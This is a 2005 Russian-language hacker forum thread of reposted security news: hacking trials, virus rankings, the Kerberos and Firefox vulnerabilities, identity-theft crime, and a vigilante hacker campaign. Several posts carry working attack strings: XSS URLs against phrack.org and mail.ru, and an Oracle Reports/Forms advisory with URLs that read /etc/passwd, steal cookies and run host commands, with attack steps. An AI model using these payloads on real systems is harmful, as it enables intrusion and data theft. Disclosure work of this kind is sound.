Британский хакер раскрывает тайны Nasa
 
39-летний британец Гари Маккиннон (Gary McKinnon), подозреваемый во взломе сетей 53 американских правительственных структур, рассказал о том, что ему удалось обнаружить в сети Национального управления по аэронавтике и исследованию космического пространства (NASA).

«Я обнаружил список сотрудников под заголовком "Неназемные сотрудники". Я думаю, то, что за этим скрывается, находится не на Земле. Я обнаружил список названий трансферов между техническими подразделениями и список названий кораблей. Это были не названия кораблей ВМС США. То, что я увидел, мне кажется, было названиями космических кораблей», — рассказал Маккиннон в интервью газете Guardian. В то же время он признался, что не может сообщить о проекте дополнительных деталей потому, что плохо их помнит. По признанию хакера, в момент взлома сети NASA он активно курил легкие наркотики.

39-летний хакер рассказал, что заинтересовался взломом сетей для того, чтобы отыскать доказательства существования НЛО. Маккиннон утверждает, что в конечном результате сумел добраться до американского центра управления космическими полетами и обнаружил там свидетельства подготовки межпланетной миссии.

Маккиннон отказывается признавать то, что его действия могли вывести американскую компьютерную систему из строя. При этом хакер согласился, что мог удалить несколько файлов из правительственных сетей, случайно нажав не ту кнопку.

«В то время, как вы находитесь в сети, можно выполнить команду NetStat — Network Status. С ее помощью можно увидеть все соединения с машиной, к которой подсоединены и вы. В числе подсоединившихся были хакеры из Дании, Италии, Германии, Таиланда... Я делал это каждую ночь в течение 5-7 лет», — рассказал Маккиннон, которому грозит лишение свободы на срок до 70 лет.

Источник:viruslist.com

w00d 13.07.2005 10:10

Пользователи считают приговор Яшану слишком мягким
 
Более трех четвертей ПК-пользователей из бизнес-структур полагают, что приговор автору червя Sasser Свену Яшану слишком мягок. Таковы результаты опроса, проведенного сотрудниками антивирусной компании Sophos, сообщает сайт vnunet.com.

Лишь менее одной пятой 550 респондентов считают, что условное лишение свободы на 21 месяц является адекватным наказанием для Яшана. В то же время 78 процентов полагают, что создатель Sasser «легко отделался». Лишь каждый 20-й респондент посчитал приговор Яшану слишком суровым.

«Мы также считаем, что приговор Яшану неадекватен нанесенному им ущербу, — комментирует антивирусный эксперт "Лаборатории Касперского" Александр Гостев. — Если подобные приговоры станут нормой, то все труды антивирусных компаний, усилия Microsoft, ФБР и других структур будут бессмысленны. Данный приговор не показывает, что написание вирусов является чем-то действительно преступным и не служит сдерживающим фактором для других вирусописателей. Наконец, если вспомнить недавние судебные процессы по делам крупных спамеров, закончившиеся десятилетними сроками заключения, приговор, вынесенный судом Свену Яшану, программа которого буквально "остановила интернет", становится просто смешным», — отметил Александр.

Приговор Свену Яшану был вынесен в минувшую пятницу. По решению суда, Яшан получил наказание в виде 21 месяца лишения свободы условно с испытательным сроком 3 года. Кроме того, создателю червя Sasser необходимо отработать 30 часов на общественных работах.

Источник:viruslist.co

w00d 13.07.2005 10:29

Microsoft выплатит 250 тысяч, обещанные за поимку авторов Sasser и NetSky
 
Компания Microsoft объявила о том, что выплатит обещанную награду в 250 тысяч долларов, которую она назначила в прошлом году за информацию об авторах вирусов Sasser и NetSky, распространение которых вызвало глобальную эпидемию и экономический ущерб на миллионы долларов.

Как известно, автором обоих вирусов оказался несовершеннолетний немец Свен Яшан (Sven Jaschan). На прошлой неделе над ним состоялся суд, который приговорил его к условному тюремному сроку в 1 год и 9 месяцев. Суд принял во внимание то, что Яшану в момент совершения преступления было 17 лет (сейчас ему 19).

Microsoft назначила награду за "сдачу" вирусописателя из-за того, что вирусы "эксплуатировали" распространенную программную уязвимость в операционной системе Windows производства этой компании. Как стало известно после объявления приговора, именно благодаря этой награде в полицию обратились два человека, данные о личностях которых не раскрываются, и рассказали то, что им было известно о Яшане (как он впоследствии признался, он очень гордился тем, что сделал и активно хвастался школьным приятелям). Теперь Microsoft обязалась выплатить им обещанные 250 тысяч на двоих.

Источник:lenta.ru

w00d 14.07.2005 10:21

It-менеджеры не представляют уровня хакерской угрозы
 
60 процентов IT-менеджеров не располагают средствами для точной оценки уровня угрозы, который хакеры представляют для их систем. Это обстоятельство выяснилось во время опроса «Тенденции в управлении рисками и уязвимостями», проведенного компанией nCircle, сообщает сайт vnunet.com.

60 процентов 1700 опрошенных менеджеров признались, что не умеют создавать отчеты об уязвимостях своих сетей по регионам или бизнес-подразделениям. Половина опрошенных призналась, что не может выполнять требования политики внутренней безопасности компании.

50 процентов респондентов отметили, что их компаниям требуется более месяца, чтобы собрать информацию для подготовки отчета о соответствии требованиям безопасности.

«Мы провели это исследование, чтобы лучше понять, как представители бизнеса видят риски сетевой безопасности, и как они ими управляют. Результаты исследования выявляют потребность в значительном количестве компаний, которые смогут внедрить решения и процессы для эффективного измерения рисков, управления этими рисками и, в конечном счете, их снижения», — заявила представительница nCircle.

Источник:viruslist.com

w00d 15.07.2005 11:37

Ошибки в Kerberos делают приложения уязвимыми
 
После обнаружения двух слабых звеньев в бесплатной технологии аутентификации сигналы об опасности поступают, кажется, отовсюду, кроме Редмонда.

Серьезные пробелы в защите популярной технологии сетевой аутентификации ставят под угрозу множество программных продуктов. Они позволяют злоумышленникам вывести из строя приложения или проникнуть в компьютеры, использующие спецификацию Kerberos, разработанную в Массачусетсском технологическом институте.

В двух предупреждениях, распространенных во вторник, MIT оценивает обе уязвимости как «критические». Университет предложил поправки для устранения проблем и утверждает, что злоумышленникам «должно быть трудно» воспользоваться этими ошибками.

Несколько производителей ПО уже выпустили обновления к своим продуктам. Так, Red Hat, Turbolinux и Gentoo предложили патчи для собственных версий Linux. Sun во вторник разослала два предупреждения, в которых признает, что несколько версий Solaris уязвимы, но патчей пока не предложила.

В силу широкой популярности Kerberos, в ближайшее время, вероятно, и другие производители выпустят секьюрити-бюллетени, полагает Брайан Грейк, главный технолог компании Preventsys, специализирующейся на анализе уязвимостей: «Думаю, что мы увидим целый поток патчей».

Microsoft тоже использует Kerberos, но собственную версию, на которую эти ошибки не влияют.

По данным MIT, оба бага относятся к Kerberos 5 Release 1.4.1, а также более ранним версиям ПО.

Независимая компания по секьюрити-мониторингу Secunia оценивает проблемы как «высококритичные» — это второй наиболее серьезный уровень опасности по ее шкале. FrSIRT оценивает баги как «критичные» по самому высокому уровню.

Грейк согласен, что уязвимости серьезны, но отмечает, что использовать их для атак нелегко. «Требуется очень много знаний, чтобы превратить эти уязвимости в эксплойты», — сказал он.

Это не первый пробел в защите Kerberos. В августе прошлого года тоже был обнаружен и исправлен «критический» баг.

В начале этого месяца уязвимость другого широко используемого программного компонента поставила под угрозу некоторые из тех же продуктов. Этот баг относится к zlib, технологии компрессии данных open source. Воспользовавшись специально составленным файлом, атакующий мог получить контроль над компьютером или вывести из строя приложения, использующие zlib.

Источник:ZDNet.ru

k00p3r 17.07.2005 17:56

Во "фраке" xss!!!
 
В http://www.phrack.org найденна xss!!!!
вот - http://www.phrack.org/show.php?p=5<script>alert();</script>&a=1

Уязвимость найденна вчера, но она там и сейчас.

Источник: www.web-hack.ru

w00d 20.07.2005 11:51

Mozilla Firefox <= 1.0.4 "IMG" Elements Code Execution Exploit
 
Mozilla Firefox <= 1.0.4 "IMG" Elements Code Execution Exploit
Цель эксплоита: Mozilla Firefox <= 1.0.4

Воздействие эксплоита: Выполнение произвольного кода

Скачать эксплоит:
http://www.securitylab.ru/_Exploits/...55exploit.html

w00d 20.07.2005 12:00

Mozilla Firefox Exploits
 
2005-07-12 : Mozilla Firefox <= 1.0.4 "data:" URLs Remote Script injection Exploit
Цель эксплоита: Mozilla Firefox <= 1.0.4

Воздействие эксплоита: Выполнение произвольного кода

Скачать эксплоит:
http://www.securitylab.ru/_Exploits/...49exploit.html

Mozilla Firefox <= 1.0.4 "Set As Wallpaper" Code Execution Exploit
Цель эксплоита: Mozilla Firefox <= 1.0.4

Воздействие эксплоита: Выполнение произвольного кода

Скачать эксплоит:
http://www.securitylab.ru/_Exploits/...47exploit.html

w00d 20.07.2005 12:33

Убытки от хакерских атак сократились
Финансовые потери от атак на корпоративные сети уменьшились более чем наполовину.

По результатам исследования, проведенного американским Институтом компьютерной безопасности и ФБР, ущерб от атак на корпоративные информационные системы в прошлом году оказался на 61 % меньшим, чем в 2003 году. Средний ущерб от атак в 2004 году составлял $204 тыс., в то время как в 2003 году – $526 тыс.

Прошлый год стал уже четвертым подряд, когда среднестатистический ущерб от хакерских вторжений уменьшается. На этом основании исследователи сделали вывод, что корпоративные системы с каждым годом становятся более защищенными.

Несмотря на повышение уровня безопасности корпоративных сетей, стоимость похищенной информации в 2004 году, напротив, возросла. Если в 2003 году она составляла в среднем $51 тыс., то в прошлом году – уже $300 тыс.

Источник:itware.com.ua

w00d 20.07.2005 12:34

Российские хакеры грабят американцев
 
Кража личности приобрела небывалые международные масштабы. Жертвами в большей или меньшей степени оказались уже 10 миллионов американцев. Американский бизнес и отдельные американцы потеряли из-за этого вида преступности в общей сложности 55 миллиардов долларов. Воры специализируются на краже в основном в англоязычных странах, а центры преступности - в России и в странах Восточной Европы. Как сообщает "Уол Стрит Джорнал", главным объектом краж остаются кредитные карты. Специализируются на этом хорошо организованные структуры, созданные по типу легитимного бизнеса. Например, одна из таких организаций, насчитывает до 4 тысяч участников, укравших с августа 2002 года по октябрь 2004 полтора миллиона номеров кредитных карт и снявших более 4 миллионов долларов.

Россия и страны Восточной Европы доминируют в этом виде преступности, поставляя технически грамотных молодых людей. Так одну из таких групп создал хакер с Украины. Интернетная страница этой группы, как и многих других, на русском языке и на английском. В связи с этим, естественно, возникает вопрос - почему в России, в отличие от Индии, ставшей компьютерно развитой страной, молодые компьютерные гении идут в преступный бизнес? Вот что думает об этом сотрудник Института Кейта, директор программ по изучению политики в области информационных систем Джим Харпер.

Джим Харпер: Я недавно участвовал в научной конференции, посвященной сравнению Индии и России. В обоих государствах появился целый слой молодых людей, очень хорошо ориентирующихся в компьютерной техники, электронных средствах информации и связи. Почему же молодежь в каждой из этих двух стран избрала противоположный путь? Отчасти дело в том, что Индия при всем ее восточном своеобразии и прочности общинных традиций, издавна ориентируется на западные ценности. Этому в значительной мере способствовало то, что Индия была британской колонией, а теперь входит в британское Содружество Наций. Для Индии естественна связь с англоязычным миром - Англией, Австралией, США.

У России иной путь. Россия до сих пор не может стать государством, в котором правит закон. Американские и европейские бизнесмены не слишком верят России, чтобы широко строить там свои предприятия, размещать там многомиллиардные заказы, как это делается в Индии. Следовательно, талантливым, технически образованным молодым людям в России труднее найти хорошо оплачиваемую работу. Они, не имеющие строгих моральных традиций, находят себе применение в интернетой он-лайновой преступности.

Ян Рунов: Могут ли США, Россия и Интерпол успешно бороться с таким видом преступности?

Джим Харпер: Конечно, здесь могут сыграть роль правоохранительные органы, в том числе международные. Здесь налицо нарушение многих международных и внутригосударственных законов. Суровый приговор лидерам и длительное тюремное заключение могут хоть в какой-то степени остановить распространение кражи личности по всему миру. Этот вид финансовой преступности грозит подрывом всей кредитной системы мира. Мы воспринимаем такую угрозу очень серьезно. Многие еще не осознают ценности информации - воровать личную, частную информацию это все равно, что воровать деньги, только вор залезает не в карман, а в личный финансовый счет.

Ян Рунов: На российских хакеров ложится задача проникнуть в интернетные файлы или выяснить по электронной почте номера банковских счетов или кредитных карт и узнать личные данные очередной жертвы. А их сообщники в США, Англии или других странах Запада должны использовать эти данные для получения наличных денег, которые затем делятся часто из расчета 40 процентов исполнителям и 60 процентов мозговому центру.

Источник:crime-research.ru

w00d 20.07.2005 12:35

Выявленные ошибки вынудили выпустить новую версию Firefox
 
Браузер open source Firefox и клиент e-mail Thunderbird будут исправлены второй раз за одну неделю, так как оказалось, что внесенные в код изменения мешают правильной работе некоторых расширений.

Обновления доводят Firefox и Thunderbird до версии 1.0.6, а Mozilla Suite будет обновлен до версии 1.7.10, пишут представители Mozilla Foundation в новостном блоге для разработчиков.

Похоже, что проблемы связаны с вышедшим на прошлой неделе обновлением 1.0.5. «Есть очень веские основания полагать, что некоторые усовершенствования в общей системе безопасности, введенные в версию 1.0.5, влияют на ряд расширений, которые с 1.0.4 и более ранними версиями работали, и в версии 1.0.6 мы хотим выявить и решить как можно больше этих проблем», — пишет представитель Mozilla.

Ввиду предполагаемого обновления Mozilla Foundation просит разработчиков временно прекратить работу по локализации ПО для неангло-говорящих рынков — шаг, вызвавший критику со стороны некоторых адептов. «Мы получаем много писем от пользователей Firefox в Польше с вопросом, почему нет Firefox 1.0.5 на польском, — пишет один из разработчиков в новостной группе, посвященной локализации. — Еще несколько дней, и за пределами США вокруг Firefox разразится большой скандал».

Другой разработчик критикует организацию в форуме, где обсуждаются сообщения об ошибках. «Десять миллионов пользователей все еще работают с 1.0.4, хотя после выхода версии 1.0.5 en-US (на американском английском) была обнародована информация о критических секьюрити-багах», — пишет разработчик.

Призывая Mozilla Foundation выпускать все свое ПО на всех языках одновременно, разработчики говорят, что задерживая версии на иностранных языках, организация обесценивает работу, проведенную программистами, продвигающими ее продукты на местные рынки.

Доступны тестовые версии обновленного ПО, и Mozilla просит сторонних разработчиков проверить, работают ли с ними их расширения. «Наиболее чувствительными к внесенным изменениям могут быть расширения, взаимодействующие с веб-контентом и событиями, — пишут представители организации. — Нужно также тщательно протестировать расширения для работы с электронной почтой, такие как Enigmail for Thunderbird (средство защиты e-mail) и Mozilla Suite».

Источник:ZDNet.ru

w00d 20.07.2005 12:37

Отказ в обслуживании в PowerDNS
 
Программа: PowerDNS версии до 2.9.18

Опасность: Средняя

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании.

Уязвимость существует при обработке определенных запросов в реализации LDAP. Злоумышленник может с помощью специально сформированного запроса заставить приложение перестать отвечать на запросы.

Удаленный пользователь, отправляющий запрос с IP адреса, которому запрещен доступ к рекурсии, может получить ответы от других клиентов, доступ к сервису рекурсии которым разрешен.

URL производителя: www.powerdns.com

Решение: Установите исправление с сайта производителя.

w00d 20.07.2005 12:38

Множественные уязвимости в продуктах Oracle
 
Обнаруженные уязвимости позволяют удаленному пользователю прочитать и перезаписать файлы, выполнить произвольные команды на целевой системе и произвести XSS нападение.

1. Уязвимость при обработке параметра DESFORMAT в Oracle Reports позволяет удаленному пользователю просмотреть произвольные файлы на системе, используя абсолютный путь к файлу. Пример:

http://myserver:7778/reports/rwservlet?server=
myserver+report=test.rdf+userid=scott/tiger@
iasdb+destype=file+MODE=CHARACTER+desformat=/etc/passwd

2. Уязвимость в Oracle Reports при обработке исполняемых файлов отчетов (*.rep, *.rdf) позволяет злоумышленнику, с правами загрузки файлов на сервер приложений, выполнить произвольные команды на системе, прочитать и перезаписать произвольные файлы с привилегиями процесса. Злоумышленник может указать абсолютный путь к файлу и выполнить отчет в любой директории на сервере.

Сценарий атаки:

1. Злоумышленник создает или модифицирует обычный отчет путем добавления вызова ORA_FFI для запуска команд или вызова TEXT_IO для создания и чтения файлов сервере прилжений.
2. Злоумышленник генерирует исполняемый файл отчета (например hacker.rdf или hacker.rep) для целевой системы.
3. Копирует исполняемый файл отчета на сервер приложений с помощью подручных средств (SMB, FTP Webdav, NFS…).
4. Выполняет отчет следующим образом:
http://myserver.com:7779/reports/rwservlet? server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF

3. Уязвимость существует при обработке параметра DESNAME в Oracle Reports. Удаленный пользователь может с помощью специально сформированного URL перезаписать произвольный файл на системе с привилегиями процесса.

4. Уязвимость при выполнении форм в Oracle Forms Services позволяет злоумышленнику выполнить произвольные команды на системе.

Сценарий атаки:

1. Злоумышленник создает обычную форму и добавляет к ней следующие строки:


"WHEN_NEW_FORM_INSTANCE"-Trigger
Host('ls > forms_is_unsecure.txt' , NO_SCREEN);
2. Злоумышленник генерирует исполняемый код формы (например, hacker.fmx) для целевой платформе.
3. Копирует бинарник формы на сервер приложений.
4. Запускает отчет следующим образом:
http://myserver.com:7779/forms90/f90...doe/hacker.fmx
или
http://myserver.com:7779/forms90/f90...tmp/hacker.fmx

5. Уязвимость в Oracle Reports при обработке параметра customize позволяет злоумышленнику просмотреть произвольный файл на целевой системе, указав абсолютный путь к нему. Пример:

http://myserver:7778/reports/rwservlet?server=
myserver+report=test.rdf+userid=scott/tiger@
iasdb+destype=cache+desformat=xml+CUSTOMIZE=
/opt/ORACLE/ias/oracle/product/9.0.2/webcache/webcache.xml

6. Межсайтовый скриптинг возможен в Oracle Reports 9.0.2 при обработке входных данных в параметре customize. Злоумышленник может выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:


http://myserver:7778/reports/rwservlet/showenv?
server=reptest&debug=<script>alert(document.cookie );</script>
http://myserver:7778/reports/rwservlet/parsequery?
server=myserver&test=<script>alert(document.cookie );</script>

http://myserver:7778/reports/rwservlet?server=
myserver+report=test.rdf+userid=scott/tiger@
iasdb+destype=localFile+desformat=delimited
+desname=FILE:+CELLWRAPPER=*+
delimiter=<script>alert(document.cookie);</script>

http://myserver:7778/reports/rwservlet?server=
myserver+report=test.rdf+userid=scott/tiger@
iasdb+destype=localFile+desformat=delimited
+desname=FILE:+CELLWRAPPER=<script>
alert(document.cookie);</script>

URL производителя: oracle.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Источник: http://www.red-database-security.com

k00p3r 27.07.2005 16:16

"Правильным" хакерам будут официально платить
 
Компания Tipping Point - подразделение 3Com, специализирующееся на компьютерной безопасности, - разработала систему вознаграждений, в рамках которой компьютерные специалисты (в том числе хакеры) смогут получать деньги за поиск уязвимостей в программах различных производителей.

Система получила название Zero Day Initiative, она будет официально представлена на конференции Black Hat в Лас-Вегасе, которая пройдет 27 и 28 июля. Предполагается, что в системе будут регистрироваться компании, желающие проверить свои продукты, и квалифицированные специалисты, которые будут заниматься непосредственно тестированием. Производители будут отчислять средства, которые будут распределяться между тестерами.

© klerk.ru

k00p3r 04.08.2005 08:38

Вирусная десятка за июль от Panda Software
 
По данным компании Panda Software, в июле наибольший ущерб компьютерам пользователей был нанесен скриптом FTP-функций SDBot. Эти данные были получены на базе статистики использования онлайнового антивирусного сервиса Panda ActiveScan.

В целом, список наиболее распространенных вирусов не особенно изменился. Единственное исключение - смена лидера. Впервые за три месяца вредоносный код Mhtredir.gen сдал свои позиции. Занимающий теперь первую строчку рейтинга скрипт позволяет некоторым версиям SDBot скачивать червя по FTP, если им удается использовать системные уязвимости, такие как LSASS или RPC-DCOM.

Четвертое место занимает семейство Gaobot - это черви с функциями бота, переполняющие интернет несколькими сотнями версий. Для создателей такой вредоносной программы польза очевидна: они могут создавать сети ботов для выполнения ряда действий, включая рассылку спама или проведение координированных атак.

В рейтинге присутствует вирус Smitfraud, нацеленный исключительно на получение финансовой выгоды: он является частью одноименной рекламной программы, которая, среди прочего, мошенническим способом пытается заставить пользователей купить якобы антишпионскую программу.

Вместе с версией BS Mhtredir занимает два места в хит-параде июля. Этот тип вредоносного ПО эксплуатирует незакрытые бреши безопасности компьютеров. Netsky.P, также вошедший в десятку, использует уязвимость, позволяющую запускать почтовые вложения просто при открытии в панели предпросмотра.

Полностью июльская десятка Panda Software выглядит следующим образом:

W32/Sdbot.ftp - 2,47%
Exploit/Mhtredir.gen - 2,08%
W32/Netsky.P.worm - 1,94%
W32/Gaobot.gen.worm - 1,56%
Trj/Qhost.gen - 1,43%
VBS/Psyme.C - 1,04%
Exploit/Mhtredir.BS - 0,95%
W32/Smitfraud.B - 0,81%
Trj/Downloader.DEW - 0,75%
W32/Parite.B - 0,75%


В дополнение к рейтингу вирусов компания составила отдельный рейтинг заражений шпионским ПО. Как и раньше, наиболее часто обнаруживаемой шпионской программой остается ISTbar. Ее основной особенностью является то, что она служит точкой входа для других подобных вредоносных программ, таких как шпионское, рекламное ПО и дозвонщики. Среди "новичков" можно отметить YourSiteBar, шпионскую программу, которая собирает пользовательскую информацию и отправляет ее рекламным интернет-компаниям. Рейтинг выглядит так:

Spyware/ISTbar - 3,32%
Spyware/Cydoor - 3,01%
Spyware/XXXToolbar- 2,79%
Spyware/New.net - 2,54%
Spyware/BetterInet - 1,13%
Spyware/Dyfuca - 0,91%
Spyware/YourSiteBar - 0,75%
Spyware/Petro-Line - 0,67%
Spyware/Altnet- 0,57%
Spyware/BargainBuddy - 0,51%



Источник: "Домашний пк"

k00p3r 04.08.2005 08:50

Вирусная двадцатка Касперского за июль
 
Email-Worm.Win32.NetSky.q 14,67%
Net-Worm.Win32.Mytob.c 13,58%
Email-Worm.Win32.Zafi.b 8,01%
Email-Worm.Win32.Zafi.d 6,54%
Net-Worm.Win32.Mytob.be 6,12%
Net-Worm.Win32.Mytob.bk 6,07%
Email-Worm.Win32.NetSky.aa 4,41%
Net-Worm.Win32.Mytob.bt 2,65%
Email-Worm.Win32.NetSky.b 2,52%
Net-Worm.Win32.Mytob.bi 2,11%
Net-Worm.Win32.Mytob.au 1,85%
Email-Worm.Win32.NetSky.d 1,73%
Net-Worm.Win32.Mytob.u 1,62%
Net-Worm.Win32.Mytob.ar 1,59%
Email-Worm.Win32.LovGate.w 1,59%
Net-Worm.Win32.Mytob.q 1,37%
Net-Worm.Win32.Mytob.t 1,30%
Email-Worm.Win32.Mydoom.l 1,20%
Email-Worm.Win32.Mydoom.m 1,17%
Email-Worm.Win32.Bagle.ah 1,04%


Источник: компулента.ру

k00p3r 07.08.2005 12:52

XSS в сервисе mail.ru
 
http://love.mail.ru/my/login.phtml?oid=0&photo_oid=0&login_action=login&t curl=&login=asd">[script]alert();[/script]

Источник: http://antiox.net.ru/

k00p3r 11.08.2005 16:09

Хакер получил информацию о 61 тыс. студентов
 
Представители калифорнийского Университета Сонома обнародовали информацию о том, что некому хакеру удалось получить доступ к компьютерной базе данных университета. Таким образом, злоумышленнику удалось похитить конфиденциальную информацию о 61 тыс. студентов университета.

В ходе работ было установлено, что хакер получил доступ к семи компьютерам, которые и содержали важные файлы. При этом злоумышленник использовал "невыявленные ранее уязвимости в операционной системе ". Взлом сети произошел в июле текущего года. Более подробная информация о том, какого рода информация попала в руки к хакеру, пока не разглашается, однако абсолютно точно известно, что в распоряжении злоумышленника оказались файлы с информацией о студентах за период с 1995 по 2002 год с их именами и номерами социального страхования.

По информации университета все пострадавшие будут в обязательном порядке проинформированы о произошедшем.



CNews

k00p3r 11.08.2005 16:10

Уязвимость в Invision Power Board
 
По сообщению Secunia, некий V[i]RuS обнаружил уязвимость в форумах Invision Power Board 1.0.3/2.0.4 (и возможно других версиях). Уязвимость заключается в возможности присоединять HTML и TXT файлы к соообщениям форума, которые содержат скрипты JavaScript. При открытии таких файлов в браузере, на компьютере пользователя происходит отображение страницы и соответственно выполнение скриптов JavaScript. Для решения этой проблемы, рекомендуется запретить прикрепление HTML и TXT файлов к сообщению форума.



http://secunia.com

k00p3r 21.08.2005 17:44

Саранский хакер
 
В Мордовии задержан хакер, взломавший один из сайтов Сбербанка России. Как сообщил сегодня ИТАР-ТАСС, начальник отдела по борьбе с преступлениями в сфере высоких технологий Алексей Ширманов, работу сайта нарушил 17-летний школьник, 11-классник одной из пригородных школ Саранска.
Он умудрился "заразить" не только сайт Сбербанка России, но, через него, и десятки других пользователей интернета во многих регионах России. Один из них обратился за помощью в ГУВД Москвы, а уж затем московская милиция обратилась за помощью к коллегам из Мордовии.

По словам Ширманова, количество преступлений в сфере высоких технологий растет очень высокими темпами. Так, если в 2004 году их было зарегистрировано 98, то только в первом полугодии 2005 года - более полутора сотен.

"Деятельность хакеров часто удивляет своей вредной бессмысленностью,- сказал Ширманов,- уж лучше бы деньги с помощью интернета зарабатывали". Между тем, по его словам, неизбежная судимость, даже условная, в дальнейшем может стать серьезным препятствием в судьбе молодого человека.

Источник: хз

k00p3r 31.08.2005 10:03

Суд над не соверщенно летним хакером
 
В США подросток приговорён к тюремному заключению сроком на 5 лет за организацию DoS-атак на компьютеры двух фирм, занимающихся продажей спортивной одежды в интернете.
Семнадцатилетний хакер Джэсмин Синх (Jasmine Singh) использовал компьютерный вирус, чтобы создать сеть из нескольких тысяч так называемых компьютеров-зомби и нанести удар по намеченным жертвам. Пострадавшие фирмы - Jersey-Joe.com и Distant Replays оценивают общий ущерб примерно в $1,5 млн.
Юного злоумышленника удалось найти по следу, который оставлял его вирус на захваченных компьютерах. Вирус высылал информацию пользователю, пользующемуся псевдонимом "Pherk". Удалось обнаружить и почтовый адрес с подобным именем, зарегистрированный на имя школьника из Нью-Джерси Джэсмина Синха.
Подросток признал свою вину и заявил, что его друг, занимающийся продажей спортивных товаров в интернете, попросил его нанести удар по конкурентам в обмен на три пары кроссовок и часы. Заказчик преступления восемнадцатилетний Джейсон Арабо также был вскоре задержан.
Первоначально Синху были предъявлены два обвинения первой степени, грозящие сроком заключения до 20 лет каждое. Затем они были заменены обвинениями второй степени, в результате чего и был вынесен относительно несуровый приговор. Также хакеру предстоит выплатить пострадавшим фирмам компенсацию в $35 тыс.

Источник:CNews.ru

SNIFF 19.10.2005 00:30

Русскоговорящее хак сообщество объявляет войну террористам
 
19 октября, 2005

В Интернете появился сайт, который призывает всех хакеров принять участие в “уничтожении ресурсов, ведущих террористическую пропаганду”. В настоящий момент усилиями неизвестных хакеров уже закрыты форум портала Кавказ-центр и блокирован счет сбора средств в платежной системе США.

На сайте peace4peace.com неизвестная группа единомышленников организовала собственный фронт борьбы с печально известным сайтом "Кавказ-центра". Как написано на сайте “Наша задача уничтожать ресурсы, ведущие террористическую пропаганду и преднамеренно искажающие факты. Законы военного времени развязывают нам руки, и мы будем использовать все доступные нам методы и средства! Наша цель - показать то, что мы едины в борьбе против террористов. Мы всего лишь участники хак-сообщества самый разных специальностей, большинство из нас уже давно находится по ту сторону закона, но это не мешает нам быть патриотами, ратующими за мир во всем мире”. По словам авторов сайта “На сегодняшний день начата крупномасштабная операция, мы вложили личного материала и оборудования стоимостью в десятки тысяч долларов, чтобы противостоять терроризму в интернете, выработали общую политику борьбы и избрали единое руководство”.

В настоящий момент уже закрыты форум портала Кавказ-центр и блокирован счет сбора средств в платежной системе США. Авторы сайта обещают длительную войну, пока не будут “уничтожены ресурсы, ведущие террористическую пропаганду и преднамеренно искажающие факты”.


Время: 08:48